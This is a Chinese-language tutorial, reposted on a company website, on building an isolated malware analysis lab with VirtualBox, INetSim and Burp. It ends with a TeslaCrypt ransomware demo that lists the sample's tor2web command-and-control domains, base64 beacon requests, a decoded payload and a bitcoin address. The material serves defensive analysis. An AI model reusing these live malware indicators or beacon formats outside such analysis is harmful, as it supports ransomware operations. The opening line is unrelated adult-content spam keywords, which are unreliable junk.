真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

這篇文章主要介紹如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析,文中介紹的非常詳細(xì),具有一定的參考價值,感興趣的小伙伴們一定要看完!

網(wǎng)站建設(shè)哪家好,找創(chuàng)新互聯(lián)!專注于網(wǎng)頁設(shè)計、網(wǎng)站建設(shè)、微信開發(fā)、微信小程序、集團企業(yè)網(wǎng)站建設(shè)等服務(wù)項目。為回饋新老客戶創(chuàng)新互聯(lián)還提供了扎魯特旗免費建站歡迎大家使用!

將使用VirtualBox,INetSim和Burp建立一個惡意軟件分析實驗環(huán)境。該環(huán)境將與與主機操作系統(tǒng)和Internet隔離,成為一個獨立的虛擬網(wǎng)絡(luò)。我們將在其中設(shè)置兩個受害者虛擬機(Ubuntu和Windows 7)以及分析服務(wù)器,以模擬HTTP或DNS等常見Internet服務(wù),以便于我們能夠記錄和分析任何Linux或Windows惡意軟件的網(wǎng)絡(luò)通信。這些惡意軟件將在沒有察覺的情況下,連接到我們的服務(wù)器而不是Internet。此外,我們將會以臭名昭著的TeslaCrypt勒索軟件為例進行分析。這是一種現(xiàn)已不存在的勒索軟件,從2015年到2016年中期感染了大量的系統(tǒng)。

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

1.創(chuàng)建虛擬機

以下是可用于下載Ubuntu和Windows 7虛擬機鏡像的兩個鏈接。

Ubuntu(受害者機器1和分析機):從OsBoxes下載Ubuntu 16.10 64 位(直接下載鏈接)

Windows 7(受害者機器2):從Microsoft Developer Website下載(選擇IE 11 on Win 7 (x86)和VirtualBox)

提示:如果你已經(jīng)擁有一個未使用的Ubuntu虛擬機,則只需克隆它并在后續(xù)步驟中重復(fù)使用即可(右鍵單擊>Clone)。

在開始之前,請確保你有足夠可用的磁盤空間(我的建議是至少10-20 GB)。

Ubuntu基本設(shè)置

OsBoxes為我們提供了一個即插即用的虛擬磁盤,我們只需簡單地插入虛擬磁盤就可以立即使用。 首先我們來解壓縮剛下載的文件。

$ 7za e Ubuntu_16.10_Yakkety-VB-64bit.7z

解壓縮后你將獲得一個虛擬磁盤的VDI文件。我們將從Ubuntu鏡像的基本設(shè)置開始,然后克隆我們的兩個Ubuntu虛擬機。

在VirtualBox中,創(chuàng)建一個新機器(單擊New按鈕),并將其命名為Ubuntu analysis(分析機)。然后,選擇要分配的RAM大小。此時,VirtualBox將會詢問你是否要創(chuàng)建新的虛擬硬盤,或使用已經(jīng)存在的虛擬硬盤。選擇“使用現(xiàn)有虛擬硬盤文件”,單擊下拉列表右側(cè)的目錄圖標(biāo),選擇我們的VDI文件。

然后,我們啟動虛擬機。默認(rèn)密碼是osboxes.org。

基本設(shè)置

默認(rèn)鍵盤使用QWERTY布局。如果你不太習(xí)慣的話,可以通過Settings > Text Entry進行更改。

此外,你也可以使用以下命令更改默認(rèn)密碼:

$ passwd osboxes

更新軟件包:

$ sudo apt-get update
$ sudo apt-get upgrade

安裝 guest additions

在運行VM的窗口的菜單中選擇Devices > Insert guest additions CD image。然后會詢問你是否要運行安裝程序; 選擇 yes,并輸入默認(rèn)密碼(默認(rèn)情況下為osboxes.org)。安裝完成后,關(guān)閉VM。

克隆

現(xiàn)在你已經(jīng)有一個基本的Ubuntu VM,克隆它(在VirtualBox主界面右鍵點擊 > Clone)。將克隆的Ubuntu命名為Ubuntu victim,并選中復(fù)選框初始化其MAC地址。克隆類型我們選擇Full clone,以進行較為完整的克隆操作。

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

Windows 7 基本設(shè)置

之前提供的下載鏈接指向包含OVA文件的ZIP存檔。與VDI文件不同,它不僅是虛擬磁盤,而且還是虛擬機(包括其虛擬磁盤)的完整描述,因此從中創(chuàng)建虛擬機所我們唯一需要做的事情就是選擇File > Import Appliance在VirtualBox的主窗口。如果你的內(nèi)存足夠大,建議最好給它至少1024 MB的RAM。

導(dǎo)入完成后(這里可能需要等待幾分鐘),重命名Windows 7受害者虛擬機并啟動它。

安裝 guest additions

在運行VM的窗口的菜單中選擇Devices > Insert guest additions CD image。然后從已插入的虛擬CD運行安裝程序。安裝完成后,關(guān)閉VM。

2.分析機的設(shè)置:INetSim,Burp

INetSim

INetSim是一個非常方便和強大的實用程序,允許你在一臺機器上模擬一堆標(biāo)準(zhǔn)的Internet服務(wù)。默認(rèn)情況下,它將模擬可以輕松調(diào)整的DNS,HTTP和SMTP。由于我們后續(xù)會將受害者機器配置為無Internet訪問,因此我們需要使用INetSim進行模擬。

安裝INetSim的方法有多種,最簡單的方法就是運行以下命令來安裝(在分析機中)。

$ sudo su
$ echo "deb http://www.inetsim.org/debian/ binary/" > /etc/apt/sources.list.d/inetsim.list
$ wget -O - http://www.inetsim.org/inetsim-archive-signing-key.asc | apt-key add -
$ apt update
$ apt install inetsim

注意:想要在分析機中復(fù)制粘貼這些命令,請選擇 設(shè)備>共享剪貼板>雙向 進行設(shè)置。

我們稍后會討論如何使用INetSim。

Burp

INetSim雖說強大,但對SSL的支持卻非常的有限。它附帶了單一主機(inetsim.org)的證書,并且不支持動態(tài)生成SSL證書。這對于我們將會是一個問題,因為現(xiàn)在大多數(shù)惡意軟件都使用SSL來加密其通信。因此,我們將使用Burp作為透明的SSL代理,它將位于受害者機器和INetSim的中間,對SSL流量進行攔截。當(dāng)然,如果你現(xiàn)在并不需要攔截一些SSL流量的話,也可以不使用Burp。

Burp支持為我們的任何受害機器生成即時SSL證書。它還為我們創(chuàng)建了一個單根CA證書,我們稍后會在受害機器中導(dǎo)入。這樣,我們就能攔截惡意軟件發(fā)送的加密通信流量了。

你可以從官網(wǎng)下載Burp。下載是一個bash安裝腳本,運行它來安裝Burp:

$ bash ~/Downloads/burpsuite_free_linux_v1_7_23.sh

默認(rèn)情況下,Burp可執(zhí)行文件為~/BurpSuiteFree/BurpSuiteFree。

3.設(shè)置一個隔離的虛擬網(wǎng)絡(luò)

我們要建立一個包含三個虛擬機的隔離網(wǎng)絡(luò)。此網(wǎng)絡(luò)將無Internet訪問。此外,我們希望分析機充當(dāng)受害者機器的網(wǎng)絡(luò)網(wǎng)關(guān),以便能夠輕松攔截網(wǎng)絡(luò)流量并模擬各種服務(wù),如DNS或HTTP。

為了實現(xiàn)這一目標(biāo),我們將使用VirtualBox internal網(wǎng)絡(luò)。對于熟悉VirtualBox的人來說,internal網(wǎng)絡(luò)與host-only網(wǎng)絡(luò)的不同之處在于,internal網(wǎng)絡(luò)根本無法訪問主機。

對于三個虛擬機的各個虛擬機,請執(zhí)行以下操作:

打開其設(shè)置

轉(zhuǎn)到“Network ”部分

將附加到字段更改為Internal網(wǎng)絡(luò)

輸入惡意軟件分析網(wǎng)絡(luò)作為網(wǎng)絡(luò)名稱

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

分析機

啟動分析機,打開終端運行ifconfig命令。你應(yīng)該有一個名為enp0s3的接口。如果名稱不同,請按照以下說明進行調(diào)整。

以root身份打開文件/etc/network/interfaces,在末尾添加以下內(nèi)容:

auto enp0s3
iface enp0s3 inet static
 address 10.0.0.1
 netmask 255.255.255.0

這將在我們的虛擬網(wǎng)絡(luò)上為機器分配靜態(tài)IP 10.0.0.1。 現(xiàn)在我們已經(jīng)配置了網(wǎng)絡(luò)接口,我們使用以下命令來啟動它:

$ sudo ifup enp0s3

Ubuntu受害者機器

這里的過程非常相似,只是我們將為它分配靜態(tài)IP 10.0.0.2,并指示它使用10.0.0.1作為網(wǎng)關(guān)和DNS服務(wù)器。在文件/etc/network/interfaces的末尾附加以下內(nèi)容:

auto enp0s3
iface enp0s3 inet static
 address 10.0.0.2
 gateway 10.0.0.1
 netmask 255.255.255.0
 dns-nameservers 10.0.0.1

并運行:

$ sudo ifup enp0s3
$ sudo service networking restart

現(xiàn)在你應(yīng)該能夠ping通分析機:

$ ping 10.0.0.1
PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=0.480 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=0.526 ms

Windows 7受害者機器

右鍵單擊任務(wù)欄中的網(wǎng)絡(luò)圖標(biāo)(或轉(zhuǎn)到“開始”菜單>“控制面板”>“網(wǎng)絡(luò)和Internet”>“網(wǎng)絡(luò)和共享中心”),單擊“本地連接2”>“屬性”,選中“Internet協(xié)議版本4”,然后單擊屬性按鈕。

我們將靜態(tài)IP 10.0.0.3分配給機器,其余部分配置與Ubuntu受害者機器類似。

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

確保驗證設(shè)置(單擊 確定,應(yīng)用等,直到所有設(shè)置窗口都消失)。你現(xiàn)在應(yīng)該可以ping通分析機:

> ping 10.0.0.1

Pinging 10.0.0.1 with 32 bytes of data:
Reply from 10.0.0.1: bytes=32 time<1ms TTL=64
Reply from 10.0.0.1: bytes=32 time<1ms TTL=64

設(shè)置完成!

4.創(chuàng)建和還原快照

現(xiàn)在我們的受害者虛擬機已正確配置,并處于干凈狀態(tài)(即未被任何惡意軟件感染)下,我們將對其當(dāng)前狀態(tài)進行快照,以便后續(xù)感染后再將其恢復(fù)至干凈狀態(tài)。

在VirtualBox中我們只需選擇Machine > Take Snapshot。你可以將快照命名為Clean state。請務(wù)必為你的 Ubuntu 和 Windows 7受害者機器執(zhí)行此操作。

當(dāng)你想要將機器重置為干凈狀態(tài)時,只需將其關(guān)閉并選中復(fù)選框 Restore current snapshot ‘Clean state’即可。

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

5.在分析機上使用INetSim和Burp來分析網(wǎng)絡(luò)流量

INetSim

像之前介紹的那樣,INetSim能夠模擬各種標(biāo)準(zhǔn)Internet服務(wù),包括DNS,HTTP(S),SMTP等。它有一個默認(rèn)的配置文件/etc/inetsim/inetsim.conf,它還附帶L了一個包含各種默認(rèn)文件的數(shù)據(jù)目錄(/var/lib/inetsim)。

由于你每次進行新分析時可能都需要不同的INetSim配置,因此我建議你創(chuàng)建一個analysis目錄,其中包含每個分析的子目錄。

$ mkdir analysis

出于演示目的,我已經(jīng)創(chuàng)建了一個子目錄,并將默認(rèn)的INetSim配置文件和數(shù)據(jù)文件夾復(fù)制到其中。

$ mkdir analysis/test-analysis
$ cp /etc/inetsim/inetsim.conf analysis/test-analysis
$ sudo cp -r /var/lib/inetsim analysis/test-analysis/data
$ sudo chmod -R 777 data
$ cd analysis/test-analysis

默認(rèn)情況下,INetSim僅偵聽本地接口。為了使其支持我們虛擬網(wǎng)絡(luò)中的所有機器,我們需要將剛剛復(fù)制的配置文件中的以下行:

#service_bind_address   10.0.0.1

替換為:

service_bind_address    0.0.0.0

現(xiàn)在,我們需要禁用systemd-resolved,這是默認(rèn)情況下隨Ubuntu提供的本地DNS服務(wù)器,否則會與INetSim的DNS服務(wù)器沖突。

$ sudo systemctl disable systemd-resolved.service
$ sudo service systemd-resolved stop

默認(rèn)情況下,INetSim的DNS服務(wù)器會將所有域名解析為127.0.0.1。我們希望任何域名解析為10.0.0.1(分析機IP); 取消以下行注釋:

#dns_default_ip    10.0.0.1

之前我提到過INetSim的SSL支持并不是最優(yōu)的,因為它只有一個單一主機名證書(inetsim.org),并且不允許動態(tài)生成每個主機的證書。為了解決這個問題,我們將在443端口上運行Burp作為我們的透明代理。因此,我們需要將INetSim的HTTPS服務(wù)器綁定到另一個端口,例如8443端口。將以下行:

#https_bind_port 443

替換為:

https_bind_port 8443

現(xiàn)在,讓我們運行INetSim!

$ sudo inetsim --data data --conf inetsim.conf
INetSim 1.2.6 (2016-08-29) by Matthias Eckert & Thomas Hungenberg
[...]
=== INetSim main process started (PID 3605) ===
Session ID: 3605
Listening on: 0.0.0.0
Real Date/Time: 2017-06-04 12:58:07
Fake Date/Time: 2017-06-04 12:58:07 (Delta: 0 seconds)
 Forking services...
 * dns_53_tcp_udp - started (PID 3621)
 * irc_6667_tcp - started (PID 3631)
 * daytime_13_tcp - started (PID 3638)
 * discard_9_tcp - started (PID 3642)
 * discard_9_udp - started (PID 3643)
 * ident_113_tcp - started (PID 3634)
 * syslog_514_udp - started (PID 3635)
[...]

如您所見,INetSim啟動了一系列網(wǎng)絡(luò)服務(wù)。這些都是可配置的,我們可以在配置文件中禁用。這個配置文件是一個很好的說明文檔,并解釋了INetSim的所有選項;因此,我建議你花幾分鐘時間閱讀它。

現(xiàn)在,啟動受害者VM,打開Web瀏覽器,在地址欄輸入任何地址(如github.com)。你應(yīng)該能看到以下內(nèi)容:

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

(請注意,此默認(rèn)文件對應(yīng)于HTML文件data/http/fakefiles/sample.html。)

回到分析機上,關(guān)閉INetSim(CTRL + C)。

* dns_53_tcp_udp - stopped (PID 3621)
* irc_6667_tcp - stopped (PID 3631)
* daytime_13_tcp - stopped (PID 3638)
[...]
Simulation stopped.
 Report written to '/var/log/inetsim/report/report.3877.txt' (24 lines)

如你所見,INetSim為我們創(chuàng)建了一份摘要報告。 它包含受害者機器與INetSim服務(wù)的所有交互信息。

=== Report for session '3877' ===

Real start date : 2017-06-04 13:18:27
Simulated start date : 2017-06-04 13:18:27
Time difference on startup : none

2017-06-04 13:18:38 First simulated date in log file
2017-06-04 13:18:40 DNS connection, type: A, class: IN, requested name: github.com
2017-06-04 13:18:40 HTTP connection, method: GET, URL: http://github.com/, file name: data/http/fakefiles/sample.html
2017-06-04 13:18:40 HTTP connection, method: GET, URL: http://github.com/favicon.ico, file name: data/http/fakefiles/sample.html
2017-06-04 13:18:40 Last simulated date in log file

SSL流量攔截

為了分析SSL流量,我們需要運行Burp。當(dāng)受害者機器啟動SSL連接時,它將首先轉(zhuǎn)發(fā)給Burp,然后burp再將其代理到INetSim。如果你現(xiàn)在并不需要攔截SSL流量,你可以跳過該部分。以下是Burp位置示意圖:

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

以root身份啟動Burp:

$ sudo /home/osboxes/BurpSuiteFree/BurpSuiteFree

(注:這里我們必須要以root身份運行它,否則將無法綁定443端口)

創(chuàng)建一個臨時項目,然后轉(zhuǎn)到“Proxy”選項卡,再轉(zhuǎn)到“Options”子選項卡。你將看到Burp的默認(rèn)偵聽器的偵聽端口為8080。

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

單擊與默認(rèn)偵聽器相對應(yīng)的行,然后編輯它(Edit)按鈕。配置如下:

綁定選項卡

綁定到港口:443

綁定地址:所有接口

請求處理選項卡:

重定向到主機:localhost

重定向到端口:8443

檢查隱形代理支持

驗證設(shè)置,類似于下面這樣:

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

默認(rèn)情況下,Burp會截停請求直至你放行。為了不必要的麻煩,我們可以在Intercept選項卡中禁用該功能。

由于當(dāng)前使用的Burp為免費版,因此不允許我們保存項目。我們可以導(dǎo)出我們剛剛創(chuàng)建的設(shè)置,以便在下次啟動Burp時導(dǎo)入它們。選擇 Burp > Project options > Save project options 完成此操作。

讓我們確認(rèn)我們當(dāng)前的設(shè)置可以正常工作。啟動INetSim,并運行:

$ curl --insecure https://localhost

你應(yīng)該獲取到以下內(nèi)容:


 
 INetSim default HTML page
 
 
 

 This is the default HTML page for INetSim HTTP server fake mode.

 This file is an HTML document.

 

在我們的受害者機器上導(dǎo)入Burp的CA證書

啟動Windows 7受害者機器,并嘗試瀏覽到HTTPS URL(例如https://github.com),你將看到類似于以下內(nèi)容的警告:

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

這是因為Burp生成的由自己CA證書簽名的SSL證書,并沒有得到受害者機器信任。

在Burp中,在端口8080上添加新的代理監(jiān)聽器,監(jiān)聽所有接口(選項卡  代理>選項>按鈕  添加):

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

然后,從受害者機器,瀏覽到http://10.0.0.1:8080。

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

單擊右上角的CA證書,下載Burp CA證書。

在Windows 7受害者機器上:打開文件,單擊 安裝證書> 下一步>將所有證書放在以下存儲中:受信任的根證書頒發(fā)機構(gòu) >下一步

在Ubuntu的受害者機器上:

將證書轉(zhuǎn)換為適當(dāng)?shù)母袷剑?crt)

$ openssl x509 -in ~/Downloads/cacert.der -inform DER -out burp.crt

并復(fù)制到/usr/local/share/ca-certificates

$ sudo cp burp.crt /usr/local/share/ca-certificates/

運行

$ sudo update-ca-certificates

默認(rèn)情況下,F(xiàn)irefox不使用系統(tǒng)的證書存儲區(qū)。如果你希望SSL連接在Firefox中也能正常工作,請在Firefox設(shè)置中轉(zhuǎn)到 高級>證書>導(dǎo)入。選擇burp.crt,選中信任此CA以標(biāo)識網(wǎng)站。

設(shè)置完成!

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

在受害者機器中導(dǎo)入Burp的CA證書后,請務(wù)必創(chuàng)建新的快照(例如,安裝了Burp CA證書的Clean狀態(tài))。

6.在分析機和主機系統(tǒng)之間設(shè)置共享文件夾

在一些情況下你需要將一些文件傳輸?shù)椒治鰴C或受害機器上;為了方便,我們可以設(shè)置一個共享文件夾。

在運行分析機的VirtualBox中,轉(zhuǎn)到 設(shè)備>共享文件夾>共享文件夾設(shè)置。創(chuàng)建一個新的共享文件夾,選擇要映射到的主機操作系統(tǒng)的本地文件夾,然后選擇一個名稱。選中復(fù)選框以使其永久化。

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

現(xiàn)在我們在分析機上,掛載共享文件夾:

$ mkdir ~/malware-analysis-share
$ sudo mount -t vboxsf -o uid=$UID,gid=$(id -g) malware-analysis-share ~/malware-analysis-share

將文件傳輸?shù)绞芎φ邫C器上

在某些時候,你很可能需要將一些文件(例如惡意軟件樣本)傳輸?shù)侥硞€受害者機器上。為他們設(shè)置文件共享是一個壞主意,因為它意味著受害者機器(并且在一定程度上,你運行的惡意軟件樣本)可以訪問它。

實現(xiàn)向Ubuntu受害者機器傳輸文件的最簡單方法是使用netcat。以下一個簡單的例子。

# Receiving machine having IP 10.0.0.2
$ nc -lvp 4444 > file.exe

# Analysis machine (sender)
$ cat file_to_transfer.exe | nc 10.0.0.2 4444

對于Window,遺憾的是我們并沒有netcat可用。這里提供一種方案就是使用INetSim將文件提供給受害者機器。

# inetsim.conf

# Remove the default line: http_fakefile           exe     sample_gui.exe  x-msdos-program
# Replace it by
http_fakefile           exe     file_to_transfer.exe  x-msdos-program

# And put file_to_transfer.exe in ./data/http/fakefiles

使用此配置,只需瀏覽任何以“.exe”結(jié)尾的URL(例如http://github.com/file.exe)即可。

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

7.演示:TeslaCrypt勒索軟件

我下載了勒索軟件TeslaCrypt的一個樣本,并將其發(fā)送到了Windows 7受害者機器,執(zhí)行TeslaCrypt。 幾秒鐘后,VM的所有文件都被進行了加密,并彈出了以下窗口。

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析

在檢查了INetSim的日志后,我們可以看到勒索軟件執(zhí)行了以下DNS查找:

7tno4hib47vlep5o.tor2web.org

7tno4hib47vlep5o.tor2web.blutmagie.de

7tno4hib47vlep5o.tor2web.fi

bitcoin.toshi.io

并向這些域發(fā)送了多個HTTP請求。

HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.org/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcdnjVzROYjh7a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzA=
HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.blutmagie.de/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh7a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzE=
HTTPS connection, method: GET, URL: https://7tno4hib47vlep5o.tor2web.fi/state.php?U3ViamVjdD1QaW5nJmtleT0xNUIzOEIxOEFGMjBDMERCMkE3Qzc3MUUwMTQzNjNGMkNCODc4MUIxNTZENTE5Q0M1RjIyMDMzNUQ0NzE0QUEzJmFkZHI9MUxOVUYzQnFMM29iMUNUMmFWcDNjVzROYjh7a2tWaVZ3VCZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE0OTY2NDg2NzUmT1M9NzYwMSZJRD0xNiZzdWJpZD0wJmdhdGU9RzI=
HTTPS connection, method: GET, URL: https://bitcoin.toshi.io/api/v0/addresses/1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT

可以看到這些請求分別發(fā)送到了類似tor2web.org,tor2web.blutmagie.de和tor2web.fi這樣的地址。這些服務(wù)允許訪問Tor網(wǎng)絡(luò),而無需安裝Tor Browser或類似工具。

該惡意軟件與Tor隱藏服務(wù)7tno4hib47vlep5o.onion聯(lián)系,這可能是某種C&C服務(wù)器。請求的payload是base64編碼的字符串,解碼后為:

Subject=Ping
&key=15B38B18AF20C0DB2A7C771E014363F2CB8781B156D519CC5F220335D4714AA3
&addr=1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT
&files=0
&size=0
&version=0.2.6a
&date=1496648675
&OS=7601
&ID=16
&subid=0
&gate=G1

它還對bitcoin.toshio.io進行API調(diào)用,可能是在檢查贖金是否已支付給比特幣地址1LNUF3BqL3ob1CT2aVp3cW4Nb8zkkViVwT。該惡意軟件似乎為每臺受感染的計算機都生成了一個唯一的比特幣地址,因為該地址并沒有任何的轉(zhuǎn)賬交易記錄。

以上是“如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對大家有幫助,更多相關(guān)知識,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道!


名稱欄目:如何使用VirtualBox,INetSim和Burp建立自己的惡意軟件分析
網(wǎng)站地址:http://weahome.cn/article/godigh.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部